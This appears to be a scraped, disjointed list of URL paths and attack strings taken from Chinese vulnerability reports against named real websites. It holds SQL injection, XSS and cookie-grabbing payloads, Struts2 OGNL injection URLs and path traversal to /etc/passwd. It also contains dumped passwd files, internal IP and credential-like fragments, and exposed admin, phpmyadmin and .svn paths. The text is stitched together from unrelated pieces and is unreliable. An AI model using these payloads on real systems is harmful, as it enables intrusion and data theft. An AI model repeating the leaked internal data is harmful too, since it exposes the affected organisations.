/editor/admin/main.php /editor/admin/default.php /user/sendpassword?type=email&input=密码重置链接接收邮箱&userId=9位数字用户ID /user/sendpassword?type=email&input=xxxxx@qq.com&userId=XX@sina.com的用户ID /2house/shop.php?id=11 /home/?uid=1480 /index.php?m=admin /androidmember/getpassbytel/login_name/{18980706050}/type/tel /androidmember/getpassbytelcheck/check_code/{594076}/member_id/{2672454 /androidmember/passreset/code/{00168745b803896429ae24e66485aa14}/id/{2672454}/type/tel/pass/{112233 /login.do /ckfinder/ckfinder.html expression(alert(1);) expression(alert(document.cookie)) /test.swf /index.php?m=content&c=vote&a=desc&vid=12 /index.php?m=content&c=vote&a=desc&vid=-12 /admin/action/system/accountuser/login.action /admin/ewebeditor/admin/login.jsp /searchTest.jsp /news_detail.php?id=581%20aNd%201=2%20unIon%20all%20selEct%20us_username,2,us_password%20from%20tbl_user /login.aspx /login.aspx /login.aspx /login.aspx /checkoutCounter/game/game.jsp?gameName=1+and+left /checkoutCounter/game/game.jsp?gameName=1+and+length /checkoutCounter/game/game.jsp?gameName=1+and+left /checkoutCounter/game/game.jsp?gameName=1+and+left /index.php?act=user.getpwd&type=1 /console/user/[userId /player/local.html?c=localstorage&h=www.tmxk.org?&_=20121206&k=volume%22%3E%3Cbbb%3E /111.txt /login/toLoginPage.do /zjsong.php?username=任意用户名 /index.asp?a=1&id=897 /lybofang.asp?id=1 /pabj.asp?id=1 /qxkp_view.asp?id=1 /shbofang.asp?id=1 /search?q=%B2%B9%B7%A2%C6%B1&initiative_id=staobaoz_20130116 /item.htm?id=16461257903&ali_refid=a3_420434_1006:1104808423:6:%B1%A8%CF%FA%B7%A2%C6%B1:3aa667d8372808ab14181f9e2b23c0d8&ali_trackid=1_3aa667d8372808ab14181f9e2b23c0d8 /item.htm?id=16992886965&ali_refid=a3_420434_1006:1104868579:6:%B1%A8%CF%FA%B7%A2%C6%B1:f8946bfbb8eca6d45a6c19a287142896&ali_trackid=1_f8946bfbb8eca6d45a6c19a287142896 /item.htm?id=20843036185&ali_refid=a3_420434_1006:1104770825:6:%B1%A8%CF%FA%B7%A2%C6%B1:027b1e487cb1aedfa4e580f324721f6e&ali_trackid=1_027b1e487cb1aedfa4e580f324721f6e /item.htm?id=16826721256&ali_refid=a3_420434_1006:1104990867:6:%B1%A8%CF%FA%B7%A2%C6%B1:d8c9bf492bc073fb126b57aa16f8e16b&ali_trackid=1_d8c9bf492bc073fb126b57aa16f8e16b /item.htm?id=18346567364&ali_refid=a3_420434_1006:1104631327:6::4a3ca9820fd62187549010dc647c655d&ali_trackid=1_4a3ca9820fd62187549010dc647c655d /item.htm?spm=a230r.1.10.74.6HVNMm&id=16298694544 /item.htm?id=16826721256&ali_refid=a3_420434_1006:1104990867:6:%B1%A8%CF%FA%B7%A2%C6%B1:d8c9bf492bc073fb126b57aa16f8e16b&ali_trackid=1_d8c9bf492bc073fb126b57aa16f8e16b /1293/?keepsession=&location=http%3A//xss.tw/Project/TestCode/pid/1293&toplocation=http%3A//xss.tw/Project/TestCode/pid/1293&cookie= xss.tw/Project/ViewCode/pid/1293&title=Xss代码测试运行 /Result/Auth/hash/8f0d2fd263093432694bc5397bbd19e3 /index.php?m=ta&id=14152418 /index.php?m=ta&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E /article!listFace.action /agentRegister.do?method=register /manager/ /admin/adminLogin.jsp /wap/login.do?uuniq=1359436782529555 /wap/findpassword/sendBandPhoneNum.do?findPasswordIndex=1&uuniq=1359436785443054 /topic/show/521 /simis/ECPortal/NewDL100/OnlineOpenFlow/OnlineOpenFlow_CRM_UnLogin.aspx?source=newproductshowhall&PrdType=4&productcode=864&eccode=&orderway=1&returnUrl=http%3a%2f%2fgd.10086.cn%2fsimis%2fProductHall%2fdata%2fproduct%2f667.html /index.php/product-189.html / /Ccheck_User_ND2.Asp?id=228 /swfview/html?id=311954 www.ztx.renren.com所利用的DedeCMS存在一个已经公布的SQL注入漏洞,通过注入漏洞可以获得管理员用户名、密码,连接数据库的用户等敏感信息,造成敏感信息泄露。并且发现可以在注入点通过load_file()函数读取文件内容,差不多相当于任意文件读取了。比如可以读取/etc/passwd,/etc/httpd/conf/httpd.conf等文件从而获得敏感信息。 /地址是集中监控平台管理地址。 /2012_first_tech_forum/的连接地址,于是我看了看整站,貌似貌似是html静态,不可能,于是我侥幸的在后面加了个admin,之后好玩的就发生了 www.865171.cn看看有什么,于是我来到这个www.865171.cn网站,发现是一个模版网,于是我什么都懂了,开始寻找那后台的模版(知道我为什么说是临时工做的了吧。。),之后我找到了这个模版 /plus/search.php?keyword=as&typeArr[111%3D@`\ /?action=spreadIndex&id=13 /product/bulletin/news_detail.php?ID=121 /user/resetpassword /user/sendpasswordsucc?type=mobile&username=xxxxxxx /user/confirmpassword /user/sendpasswordsucc?type=mobile&username=xxxxxxx /dopool_web/managelist.aspx,后台有个“管理员管理”菜单,点一下,所有管理员的用户名和密码都出来了,而且密码是明文的。用得到的一个管理员用户登录了后台。在后台是可以修改软件下载地址的,如果被下载的软件被替换成了恶意软件,后果很严重。此外在后台还可以修改网站的友情链接,如果把安卓网等访问量比较大的网站修改为钓鱼网站的地址,可能泄露用户的个人信息,后果也很严重。 /pay/pay.html /dopool_web/XiazaiList.aspx?PNO1= /web.zip / /images/ /myrest/order1.asp?orderid=5357217 /website/xfPortal/XFPortalAction!index.action /static/js/patch.php?app_key=[注入点 /static/js/patch.php?app_key=1'%20and%20(1=1)%20and%20'1'='1 /static/js/patch.php?app_key=1'%20and%20(1=2)%20and%20'1'='1 /static/js/patch.php?app_key=1'%20and%20 /static/js/patch.php?app_key=1'%20and /static/js/patch.php?app_key=1'%20and%20 / /club/phone/editphone!proModifyPhone.action?phoneId=640 /whole/letter/b/p/1.html /whole/letter/b*/p/1.html /Modules/uploadForm.htm?UrlPath=/ /),鼠标无意点到“114啦浏览器入选2010华军我最喜爱的软件评选”,然后。。 /zt/2010/vote/vote.php /zt/2010/vote/config/config.php /softinfo.php?pack=/*XSS*/ /etc/passwd /400/pay/rechargeonline?body=zj18675600179%B3%E4%D6%B5%B6%D2%BB%BB%BB%FD%B7%D6&buyer_email=xiaojiong1991%40gmail.com&buyer_id=2088702688628368&exterface=create_direct_pay_by_user&is_success=T¬ify_id=RqPnCoPT3K9%252Fvwbh3I70VvLcY7qmeeu8qm3TTjGn%252FBkh%252BERX1f3Xl9bBtbubq3ZvKD0v¬ify_time=2013-02-01+01%3A28%3A08¬ify_type=trade_status_sync&out_trade_no=906311982_1&payment_type=1&seller_email=pay%40haodf.com&seller_id=2088101708599020&subject=%B1%EA%D7%BC-%B6%A9%B5%A5%BA%C5(906311982_1)&total_fee=0.10&trade_no=2013020144984236&trade_status=TRADE_SUCCESS&sign=55fc3aad7fc0826431e71cece8731b1b&sign_type=MD5 /telpayment/showtelaccount?from=present&orderId=906312072 /News.aspx?SearchInfo=1 css.k-touch.cn/bbs/config.inc.php.bak css.k-touch.cn/phpmyadmin /system/login.aspx /admin/admin_log.asp / /EC0703.V6014.rar history.back() history.back() history.back() history.back() /survey_vote.php?survey_id=5377&question_type=radio&id=26800 /index.action inet 10.199.18.29 10.199.18.67 x:0:0:root:/root:/bin/bash x:0:0::/home/frxcard:/bin/bash /member-1300-reply-send.html /member-1311-reply-send.html /member-1322-reply-send.html /ids/cn/haier_login.jsp?returnUrl=http://www.haier.com/cn/ /ids/cn/forget_password_reset.jsp?code=******** /my/turbine/template/corcenter%2Ccompany%2Ccompany_show.html /baihe/3 /userAction.do?method=toUpdateUserInfo&typeint=1 /id5/authedId5.action /test/image2base64.php a=function(text){var /act/a20130121newyear/card.shtml www.lesuke.com/user/getPwdSuc.jsp /user/recaccount/xxxxxx/ /user/recaccount/19775/ /v_show/id_XNTA5ODQxMjU2.html /t0Oy9U?'+Math.random() /2013/01/07/085/13575224858054398m.png /t0Oy9U?'+Math.random() /survey_vote.php?survey_id=5377&question_type=radio&id=26800 /2010/pdf/index.asp?pdfaddr=index.asp /2010/pdf/index.asp?pdfaddr=index.asP /?controller=act&action=index&name=/../../../../../../../../../../../etc/passwd%00.html /user/ajax?mode=sentmail&uid=164000&uname=xxxxxxxx&mail=xxxxx@qq.com×tamp=1359722420037 www.zhuna.cn /api/gateway.php?bid=120216&method=search&agent_md=d98c1c10952074bf&agent_id=200605存在注入 /api/note.php?mod=login这个地方,可以用主站账号登录,判断跟主站同一个库,注出几个账号后发现判断正确 /379610694 /friend/ajaxfriendlist /pm/index/newpm/uid=379610694 /opta/live1.php?id=f155688 /m1/login.do /m1/login.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) /m1/login.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) /m1/login.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) /m1/login.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) /readimage.aspx?xh=xxxxxx&bs=ckzp www.pkav.net中设置xss字段到pkav.net域 www.pkav.net /member-account/register.html /deal-1316.html /images/js/basic/fileloadmanager.js /images/js/login/loginmanagerv2.js?onlyCookie=1&needMaskDiv=1&needReloadPage=1 /images/js/jquery/jquery-1.3.2.min.js /js/web201206/base.js /js/web201206/userinfo.js /js/web201206/protocity.js /js/web201206/scroll.js /web201107/js/MK.Comm.js /js/plat/xinyuecfg.js /js/plat/lotterymanager.js activityId:1906 false false / / /userCenter/orderCtrl/detail?orderId=201302044685 /userCenter/orderCtrl/detail?orderId=201302044682 /p/2045714993 xsser.me/Bqp9Ry wbuid:1673450172 xsser.me/Bqp9Ry /p/2134900096 /adult-admin/login.do /1.js /Member/SendMobileMsg.do?Sat%20Feb%2002%202013%2017%3A14%3A30%20GMT+0800&userid=1234567 /index/search /shop/OrderSuccess.aspx?OrderID= /shop/OrderSuccess.aspx?OrderID=1458 /shop/OrderSuccess.aspx?OrderID=1459 /loreg/page/tologin /.svn/entries /.svn/text-base/index.php.svn-base /inc/.svn/text-base/globalFunction.php.svn-base /LoginUser?USERNO=%27&PWD=%27 /mos/kancha/prew_order.aspx?orderid= /mos/kancha/prew_order.aspx?orderid=201003120004 /mos/kancha/prew_order.aspx?orderid=201003120003 /js/index_zs.php?alltid=0&tid=154&allnum=5&per=5 / / /rateinfo/mobile/ConditionSearchResult.aspx?currname=1 /share/download.jsp?filePath=../../../../../../etc/passwd&fileName=wind.txt x:0:0:root:/root:/bin/bash x:1:1:daemon:/usr/sbin:/bin/sh x:2:2:bin:/bin:/bin/sh x:3:3:sys:/dev:/bin/sh x:4:65534:sync:/bin:/bin/sync x:5:60:games:/usr/games:/bin/sh x:6:12:man:/var/cache/man:/bin/sh x:7:7:lp:/var/spool/lpd:/bin/sh x:8:8:mail:/var/mail:/bin/sh x:9:9:news:/var/spool/news:/bin/sh x:10:10:uucp:/var/spool/uucp:/bin/sh x:13:13:proxy:/bin:/bin/sh x:33:33:www-data:/var/www:/bin/sh x:34:34:backup:/var/backups:/bin/sh x:38:38:Mailing /var/list:/bin/sh x:39:39:ircd:/var/run/ircd:/bin/sh x:41:41:Gnats /bin/sh x:65534:65534:nobody:/nonexistent:/bin/sh x:100:101::/var/lib/libuuid:/bin/sh x:101:103::/home/syslog:/bin/false x:102:105::/var/run/dbus:/bin/false x:103:106::/nonexistent:/bin/false x:104:109::/var/lib/landscape:/bin/false x:105:65534::/var/run/sshd:/usr/sbin/nologin x:1000:1000:xiaohong,,,:/home/xh:/bin/bash x:106:113:ftp /bin/false x:1001:1001::/home/xiaohong:/bin/false x:1002:1002::/home/ftp1001:/bin/false x:1003:1003::/home/ftp1002:/bin/false x:1004:1004::/home/ftp1003:/bin/false x:1005:1005::/home/ftp1004:/bin/false x:1006:1006::/home/ftp1005:/bin/false x:1007:1007::/home/ftp1006:/bin/false x:1008:1008::/home/nhy:/bin/false x:107:115::/var/spool/postfix:/bin/false /rrlcs/suggest/suggest.jsp /rrlcs/admin/manageMessages.jsp?left=1 /rrlcs/admin/index2.jsp?msg=success /rrlcs/admin/side.jsp?moduleid=9 /rrlcs/admin/managegoods.jsp /rrlcs/admin/viewgoods.jsp?id=69 /code/explore/jbossas whirlwind110@live.com /上注册任意账号,然后创建图片集应用,接下来上传一个图片马 /shop/member!passwordRecover.action /app.php?do=app_add /user/canceled.asp?f=51273654&u=aa43e59168c91dbf /user/canceled.asp?f=51274571&u=aa43e59168c91dbf /login.action lh.9you.com/web_v3/bcastr.swf?bcastr_xml_url=xml/bcastr.xml alert(1) alert(1) /2013/happyGetData?att=1&uid=2074219121&mid=3541949564378375&rl=0&vt=1 http://passport.note.sdo.com/bin.zip /beijing-recommend/g0n15/%3Cscript%3Ealert%28/1/%29%3C/script%3E /hangzhou-recommend/D1g1x30n16/%3Cscript%3Ealert%28%2F1%2F%29%3C%2Fscript%3E http://222.73.12.140/SelectCity.asp http://222.73.12.188/111.rar /service.shtml /lib/ /admin.php?module=Noticeol&action=detail&nid=37 /admin.php?module=Noticeol&action=detail&nid=37 053a9bf72434f7f8:localhost 32ce979f1810450d:% 532a371916879d65:% 63e483b832b5e91a:% xiaonei_ts:38e845946c9b5163:10.22.225.110 crm_zl:0e1493ed782f704c:10.4.130.79 10.22.225.238 565491d704013245:10.22.225.20 10.6.57.60 10.30.33.56 565491d704013245:10.30.32.141 10.22.225.89 10.22.225.90 10.30.33.80 renren_sz:09d725012d72e6ab:10.30.37.22 renren_lzr:09d725012d72e6ab:10.22.227.110 27df606e7932e98c:% 658d4f1d5d32391d:10.% 565491d704013245:% x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news:/sbin/nologin x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:81:81:System /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:37:37::/var/lib/rpm:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:34:34:Network /var/crash:/bin/bash x:28:28:NSCD /:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:4294967294:4294967294:Anonymous /var/lib/nfs:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:66:65:tog-pegasus /var/lib/Pegasus:/sbin/nologin x:500:500:Zabbix /home/zabbix:/bin/false x:100:103:MySQL /var/lib/mysql:/bin/bash crm.imop.com/config.inc.php localhost:3306 org:3306 localhost:3306 /fckeditor/ /lib/FCKeditor/ 10086.cn/*就自动启用兼容模式的,所以只要构造一个http://127.0.0.1/www.10086.cn/aaa.html应该就能满足它的条件。 /aaa/SSSSSSSSSSS....SSSS.torrent /aaa/SSSSSSSSSSSS....SSSS www.10086.cn/ge.html处,再用火狐访问,火狐如愿崩溃。。 55like /parties/mascot/view.php?num=1 /2013/01/341.html的一个补充吧,不是所有情况都可以用防嵌入来解决点击劫持.具体看漏洞证明 link link}\r\n link}{dede:yy520 yy520 None img img}\r\n /dede:img}{dede:yy520 yy520}.jpg /admin/login.php /member/index.php /mblog/pic/20132_11_3/s_pzenz7686783935702.jpg","extraData":{"smallest":{"w":90 /mblog/pic/20132_11_3/s_pzenz7686783935702.jpg\u0022\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029","extraData":{"smallest":{"w":90 /app/enter?appid=280383 /admin/main.htm /registration/login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) www.xxx.com/xxx.mp3 /photo_upload.do?userAgent=Mozilla/5.0%20%28Windows%20NT%205.1;%20rv:17.0%29%20Gecko/20100101%20Firefox/17.0 /person/myphoto_post?photoUrl=http%3A%2F%2Fimg4.y.duowan.com%2F1667137.jpg&_=1358839269545 /person/myphoto_post?photoUrl=http:// 0x0F /subject/tools/test.php /upload/2013/0127/1359286641_05159.jpg/.php /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389 /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and / / / / /user/domain_list.aspx /user/domain_list.aspx /user/domain_list.aspx /user/domain_list.aspx /user/domain_list.aspx /user/domain_list.aspx /user/domain_list.aspx /topicList.html?panel_id=1&logiRonId=5中发帖存在XSS,经测试可完整执行各类script,iframe。 www.zjagri.gov.cn/root.rar /cms/plus/search.php?keyword=as&typeArr[111%3D@`\ /embeded/login.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) alert(code)弹! d.youc.com/dede/ /onlineservice/suggest/index.htm /user/msg_read.aspx?MessageID=597884 /webmaster/exesql.aspx /uploadaction!befforeWai.action?filetype=1 /ProductDetail/index/id/2056.html /Product/lists/id/41/filter_attr/3261.0.0.0.0 /HTML/JoinUs/Resume.aspx?id=24 /JoinUs/Resume.aspx?id=24 /sys/sys_login!login.action //plus/search.php?keyword=as&typeArr[111%3D@`\ /user/piclink_xml1.aspx?page=30&ram=0.8126895087771118 /user/piclink_xml1.aspx?page='30&ram=0.8126895087771118 /phpclient/cms/register.php /myvote.asp?VoteID=11 /user/setPwd/v/101b029ae8b22a7eded7154070156a49 /user/setPwd/v/ /userservice/login/default_login.jsp /userservice/login/toLogin.action /resource/news/newslist_rpt.aspx?typecode=001%27%20%20or%201=1-- /resource/news/newslist_rpt.aspx?typecode=001%27%20%20or%201=2-- /resource/_pub/EditSrc/ImgMag/ImgMag_main.aspx /pay/card_list /e/DownSys/DownPic/index.php?down_file= /cmd.asp?act=gettburl&id=104%22%3E%3Cimg%20src=1%20onerror=alert(1);%3E cmd.asp?act=gettburl&id= /cmd.asp?act=gettburl&id=39 /cmd.asp?act=gettburl&id=15 /questionnaire/index.php?questionnaireId=2 19.0 /rent/backstage/InputFront/PhoneProcess.aspx /rent/backstage/InputFront/PhoneProcess.aspx' /status/replystatus.do?doingid=4569682743&id=330615009&htf=727&sid=--M5bfiIpcMPeAy2Ay1WcN&jyw81c&ret=stories.do%3F%26tab%3D100%26htf%3D1512%2321399938224-n-%E6%96%B0%E9%B2%9C%E4%BA%8B-n-0 /home.do?&sid=--M5bfiIpcMPeAy2Ay1WcN&shiyvy&htf=1 /newuc/user/reg /wawa/app/box/cloud.php,来到个人曲库进行添加文件夹。 /ms08078.html /sd/内,点开一个晒单的帖子 /fly/search.jsp?searchText=%22%3E%3C/form%3E%3Cimg%20src=x%20onerror=%22javascript:alert%285%29%22%3E /index.php?url=content&id=3243 /webpage/column/regist1.shtml /wawa/ /AjE5se /wawa/app/box/cloud.php?kugouid=80213056 /IndexAction.action?pageId=newsdetail&newsId=1014 /card/game.jsp?gameName=QQ&remark=&supplier=qq:HTML jingcha utf-8 fid:43460 47176b351fbb9b5e1361019044 /ser.php?username=加密后的用户&url=用户正常访问的url(弹完广告后回调,由于做得不好,没跳转过来,卡住了,至少要把劫持产品做出体验效果来啊!)&pushid=pushid /s?wd=221.235.37.57%3A3437 / / /?controller=myorder&action=details&id=3536 /grboss/menufeemgr.action /index.php/News/detail/id/72 /index.php/News/detail?id=72 /index.php/News/detail/id/72 /index.action /huabei/about.action /index.php?action=more&op=&rtype=3&stype=0&todo=ajax /index.php?action=more&op=&rtype=3&stype=0&todo=ajax /index.php?action=more&op=&rtype=3&stype=0&todo=ajax /index.php?action=more&op=&rtype=3&stype=0&todo=ajax /index.php?action=more&op=&rtype=3&stype=0&todo=ajax /z_-1%22%20or%20%2262%22%3d%2262 /z_-1%22%20or%20%2262%22%3d%22621 / / / /index.html /topic/F1/ /signinservice.asmx/GetSignInUsersSignInForList?pageIndex=1&SortType=FALSE&SortField= www.imaibo.net/index.php?act=newslist&app=investment&mod=News&newsType=1&stockId=4324 /member/login /member/login /member/login /member/login /member/login /u58/v_ODY5ODgzMTE.html /u58/v_ODY5ODgzMTE.html /show.php /question/master/FCKeditor/editor/filemanager/connectors/test.html /chart/tmp-upload-images/hfy.php /Company/zd.asp?action=9&action1=4&C_Id=13 /jsInfoList.php?game_id=136&category_id=2399&st=1&tn=10&zlNum=7&url=zq /oauth/signup-id-632861.html /oauth/signup-id-632860.html /more.asp?id=644 /topicLab/index.php?m=user&a=upload&name= /trade/servlet?Search=SX_SelectGS&RegNO=97198'%20and%20'a'='a&IntCls=9 /alipay/alipayto.php?orderid=201302201207430&subject=%E6%A0%87%E5%87%86%E8%AE%A2%E9%98%85&total_fee=198 / /app/poster /app/poster/edit/我是ID?typeId=1 /p_02368-1%22%20or%20%22107%22%3d%22107 /p_02368-1%22%20or%20%22107%22%3d%221071 / / / /jeeadmin/jeecms/index.do /trend/follow?k=此处插入任意文本&rl=1&vt=1 /trend/follow?act=recommendc&k=此处插入文本&rl=1&vt=1 /im/ChooseService.aspx?Sale=2&car=36 /sdm/plat/login.action /mcolumn/expdetail.php?mid=1100 /mcolumn/expdetail.php?mid=1100 /mcolumn/hottag.php?tid=752 /mcolumn/hottag.php?tid=752 /2013/01/341.html的一个补充吧,不是所有情况都可以用防嵌入来解决点击劫持.具体看漏洞证明 http://2012fz.huaian.com/show.php www.huaian.com的用户表: Kesion 111394,9537636 Set Set PaymentPlat=1 Set Set AccountID=RSP("AccountID") MD5Key=RSP("MD5Key") PayOnlineRate=KS.ChkClng(RSP("Rate")) RateByUser=KS.ChkClng(RSP("RateByUser")) Set Set Set OrderStatus=rs("status") XID=RS("ID") set set Set set RealName=rsUser("RealName") Edays=rsUser("Edays") BeginDate=rsUser("BeginDate") Set /snjyw/member.do?method=ajaxuserid&userid=hacktest /snjyw/member.do?method=ajaxuserid&userid=hacktest%27%3Ciframe%3E Set ChannelID=KS.G("ChannelID") alert(document.coookie) /public/test-book.asp?action=xiangxi&ColumnsArticleID=%7BCF883C28-CD30-408F-9DE2-ABC45D99022D%7D /cms/webpage39.htm /.svn/entries /.svn/text-base/config.php.svn-base /.svn/text-base/config.php.svn-base /.svn/entries /app/www/templates/adminMobile/tt.html /cmsAdmin/cmsAdmin.php /templates/fckeditor/ /app/www/templates/common/fckeditor/editor/fckeditor.html /news/newsid!NewsById.a?Id=1200 /getcompanyinfor.action?website1=www.gqsoso.com%27%20and%201=%271 /getcompanyinfor.action?website1=www.gqsoso.com%27%20and%202=%271 /syjoauth/rs/userpublic/resetPassword?email=邮箱账号&client_id=875.cn&key=57a24ddf32f5ad9e8187d0a529a96a47 /zh-CN/feedback.php /common/post/login.php?next=%2Fcommon%2Fpost%2Frm.php%3Fc_id%3D2%26mc_id%3D1%26id%3D1367612%26post_url%3Dhttp%253A%252F%252Fjn.ganji.com%252Ffang1%252F455961215x.htm%26nocache%3D1361285679890%26phone%3D此处为手机号码&username=%23t_174532472&sms_rm=2_1_1367612&domain=jn /1/1/gif.php /pk.php?a=list&id=28 /globalmail.cn.rar /scjt/frontVoteServlet?method=more&msgtype=4 /scjt/VoteServlet?method=vote&id=ffb644c0d433413fa3a7be42e1b6d4a6&msgtype=4 /scjt/ /fckeditor/ /webapp/hotelinfo.asp?hid=7586 /webapp/hotelinfo.asp?hid=7586 /webapp/hotelinfo.asp?hid=7586 /webapp/hotelinfo.asp?hid=7586 / /guanli/order/orderlist.asp?orderid=65918&member=gszhdy /guanli/order/orderlist.asp?orderid=65917&member=0917wwb sql.php tbl_structure.php tbl_structure.php /my/sql.php?db=ecshop&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=a9bf48954d59c98098ba16944b0b8449&table=ecs_stats&goto=tbl_structure.php /sys_admin/ /sys_admin/login.php /sys_admin/menu.php /marry/marryadmin/web/login.php /ncmmw2013/index.php www.shvns.com /0day/phpcms_v9_csrf_add_admin.php /specialprice/getspecialprice?t=0.4316234832371361&top=20&dep=PEK /download.aspx?image=index.aspx /download.aspx?image=make.aspx /admin/index.php /phpinfo.php /phpmyadmin/scripts/setup.php /phpmyadmin/index.php /.svn/entries /.svn/text-base/comm.php.svn-base /index.action /webexam/UserFiles/CkeditorFiles/Image/201302/20130224233701325.jsp /xxfb/wsbs.do?method=enterWsbs&type=2&lm=wsbs&ksbm= /webexam/ /webexam/console/login.jsp?isNew=true / /ucva/phoneareaupdate.php?uid=258667 /dnf/act/test/ht.php?app=800100574&txt=CODOL%20%20%20%20%D4%B8%20%20&num=2&rd=797&callback=jsonpCallback2%27%3E%22%3E%3Cimg+src%3Da+onerror%3Dprompt%281%29%3E /international.html?back_radio=2&fromcity=&date=&Rtdate=&area=&area_radio=1&fc_fromcity=%D6%D0%CE%C4%7C%C6%B4%D2%F4%7C%CA%D7%D7%D6%C4%B8&fc_tocity=%D6%D0%CE%C4%7C%C6%B4%D2%F4%7C%CA%D7%D7%D6%C4%B8&date=yyyymmdd&date2=yyyymmdd&tocity=';window.a==1?1:prompt(a=1);// /user/user/followingp?isnext=1&perpage=10&previd=13450826963028&callback=getIdolOrFansList&_=1360937823109&uid=4055919433585000455x1%bf%27or+2+limit+1%23 jjd.panjin.gov.cn/more.php?id=2518953377698进去显示“需要博彩流量的朋友可以与我联系,详细了解加我QQ与我洽谈,了解情况后先付定金测试。拒绝探子” /Discuz!/uc_server/admin.php论坛的uc后台存在弱口令,, /beta/help/index /index.php/interview/show/bq-wy/id-8 /hp2010/marketing/newscontent.php?news_id=737 /top/ajax/friendships?user_id=11223344&att_location=profile_userprofile&action=create&_t=0 /report/ajax/friendships?user_id=11223344&att_location=profile_userprofile&action=create&_t=0 /interface/video_pub.php?type=3&value=464&limit=200 /sso/login?service=http%3a%2f%2fjf.ct10000.com%2fSelfHelp%2fdefault.aspx 3A2C8BC3-5B68-4AE5-81D6-6DC378708F3E F3D0D36F-23F8-4682-A195-74C92B03D4AF /manage/admin/admin_db.php?sId=1 /account/ajax.php?action=bindcode&v=13800138000 /people/!Nzc0MDcwYjEwNjQyNDM3ZkBmb2N1cy5jbg==/ /test.php /admin/ /install.lock /admin.php /Admin/Login.asp /comindex.action /getcompanyinfor.action?website1=www.xxx.com www.xxx.com,就成了经过工商认证的钓鱼网站.或者利用注入直接添加虚假执照,修改website1的值,等等 /getcompanyinfor.action?website1=www.xxx.com / plus.kanglu.com/plus/AILISERVER/server/extend/model.class.php /yao/index.php?page=20&m=yyzhaos&a=index&tagid=56 /mysql/sql.php?db=urlevent20121029&table=url201210299&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=9aee24a05451840079a998ca31bab5e6&goto=tbl_structure.php&back=tbl_structure.php&sql_query=ALTER+TABLE+%60url201210299%60+DROP+%60GETORPOST%60&cpurge=1&purgekey=GETORPOST&zero_rows=Field+GETORPOST+has+been+dropped www.9588.com /default.aspx?cooperateid=92545 /web/admin/login.php /admin/upload/upload.asp /article_cont.php?id=1201 /info.php /test.php /test1.php /images/newlogo.png/1.php /site/bwf/profile/backpwd3_inpwd.jsp?userCode=wangtao /site/bwf/profile/backpwd3_inpwd.jsp?userCode=liqiang /site/bwf/profile/backpwd3_inpwd.jsp?userCode=wangxue /site/bwf/profile/backpwd3_inpwd.jsp?userCode=wangdan /version/kav_setup.exe/.php softdl.pcdoctor.kingsoft.com/version/kav_setup.exe softdl.pcdoctor.kingsoft.com/version/kav_setup.exe / /svn/ /index.php?m=index.showimg&p=C:\boot.ini /index.php?m=index.showimg&p=index.php /ask/question/create /index.php?s=show&a=getapp&name=worth&uid=1718397773&wid=3256 /reg.asp /cn.pub.vpon.com/register.action /Login.aspx /Modules/agent/domain/domain_manage.jsp还是可以直接填写【MD5字符串】登陆(这里密码输入有长度限制,改一下就ok了) /Modules/agent/domain/domain-dns.jsp www.aimabz.com/www.86gw.com(北京婚庆网)、www.hongxiutuan.net(爱丽国际旗下团购网站)、www.7120.com(健康120)、www.huyigroup.com.cn(爱丽国际广告,可能是集团官网吧)......可能略有误差,呵 /install/install.core.php /home/cache/cachedata.php /core/api/shop_api.php 